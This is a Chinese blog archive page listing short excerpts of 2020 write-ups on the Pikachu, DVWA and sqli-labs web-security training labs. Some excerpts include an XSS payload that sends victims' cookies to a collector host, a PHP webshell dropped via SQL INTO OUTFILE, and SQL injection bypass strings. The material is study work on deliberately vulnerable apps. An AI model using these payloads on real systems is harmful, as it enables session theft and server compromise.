02 2020 档案
摘要:sql注入漏洞 危害是最大得 sql注入类型: 数字型 user_id=$id 字符型 user_id='$id' 搜索型 text like '%{$_GET['search']}' " select 字段1 from table where id=1 会显示表中第一行信息 select 字段1
阅读全文
摘要:目录遍历漏洞概述 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。 当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。 在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过
阅读全文
摘要:PHP反序列化 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题 常见的几个魔法函数: __construct()当一
阅读全文
摘要:URL重定向 不安全的url跳转不安全的url跳转问题可能发生在一切执行了url地址跳转的地方。如果后端采用了前端传进来的(可能是用户传参,或者之前预埋在前端页面的url地址)参数作为了跳转的目的地,而又没有做判断的话就可能发生"跳错对象"的问题。url跳转比较直接的危害是:-->钓鱼,既攻击者使用
阅读全文
摘要:越权 如果使用A用户的权限去操作B用户的数据,A的权限小于B的权限,如果能够成功操作,则称之为越权操作。 比如普通用户修改去完成高权限(超级管理员)账号范围内的操作 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,
阅读全文
摘要:0x00 不安全的文件上传漏洞概述不安全的文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 比如上传头
阅读全文
摘要:Pikachu-Unsafe Filedownload 不安全的文件下载 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成
阅读全文
摘要:文件包含漏洞: File Inclusion 本地文件包含漏洞 远程文件包含漏洞 根据不同的配置环境,文件包含漏洞分为如下两种情况: 1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的, 因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读
阅读全文
摘要:RCE remote command/code execute 远程系统命令/ 代码执行 系统从设计上需要给用户提供指定的远程命令操作的接口。可以测试一下自动运维平台。 在PHP中,使用system、exec、shell_ exec、passthru、pcntl_exec、popen、proc_po
阅读全文
摘要:CSRF 在CSRF攻击场景中攻击者会伪造一个请求 (一个链接) 然后欺骗目标用户点击,用户一旦点击了这个请求,整个攻击也就完成了 所以CSRF攻击也被称为“one click“攻击 例子: 想要修改lucy购物地址信息 lucy必须处于登录的状态,lucy必须点击攻击链接 xss和csrf区别:
阅读全文
摘要:xss后台的安装 重定向到另一个可信网址 让点击者 不知情 1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=
阅读全文
摘要:XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; 危害: 存储型>反射型>DOM型 1.反射型XSS(get
阅读全文
摘要:第一步链接数据库 修改配置文件,重置数据库~ 基于表单的暴力破解 进入暴力破解的子选项:基于表单的暴力破解。我们可以看到如下界面 我们随便输入信息然后设置代理用burp suite 进行拦截数据包。 发送到Intruer模块。 这里简单介绍一下Intruer模块。里面有四个选项卡,分别是: atta
阅读全文
摘要:Insecure CAPTCHA Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。
阅读全文
摘要:File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 LOW:代码
阅读全文
摘要:CSRF(Cross-site request forgery) CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的
阅读全文
摘要:XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在
阅读全文
摘要:File Inclusion File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,
阅读全文
摘要:Command Injection Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一 前置知识: Command 1&&Command 2 先执行Command 1,执行
阅读全文
摘要:官网下载地址:https://code.visualstudio.com/# 汉化包 可以右击在浏览器里打开 VSCode 前端常用插件: https://www.cnblogs.com/sanday/p/10162713.html 常用字体 左面图标说明: 新建文件 新建文件夹
阅读全文
摘要:DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute
阅读全文
摘要:less 54 ?id=1 http://192.168.50.100/sqli-labs/Less-54?id=1' order by 3 --+ 正常 http://192.168.50.100/sqli-labs/Less-54?id=1' order by 4 --+ 不正常 ?id=0'
阅读全文
摘要:lines terminated by xxx 以xxx为结尾:select '<?php @eval($_ POST[crow]);?>' into outfile 'C:\pbpstudy\PHPTutorilWWW.crow.pbp’ linesterminated by 0x363636;最
阅读全文
摘要:less38Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。 而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ;表示语句结束。 这样我们就想到了是不是可以多句一起使用。这个叫做stacked injec
阅读全文
摘要:less34 admin admin ad ad a%df’ a%df’ 登录失败 a%df\' uname=a%25df%5C%27&passwd=1111&submit=Submit a%df%5C%27 删除25 改包后 再次执行一次 然后再修改包 猜列数 也可以使用第二种方法 ' > �'
阅读全文
摘要:\less 32 例子: id= 1’ 处理 1 \ ’ 进行编码 1 %5c %27 带入sql后 and XXXX 此时无法完成注入 id=1%df’ 处理 1 %df \ ’ 进行编码 1 %df %5c %27 带入sql后 id =1運’ and XXX 此时存在宽字节注入漏洞 推荐解码网
阅读全文
摘要:less28 id=1 显示正常 id=1’ 显示不正常 说明存在注入漏洞 接下来得坑 请注意 ?id=1‘ || ’1‘=‘1 这个时候数据回显正常 ?id=1‘ %a0 union %a0 select %a0 1,2,3 || ’1‘=‘1 这个正常的操作但是显示确实错误的? 我们将 ||进行
阅读全文

浙公网安备 33010602011771号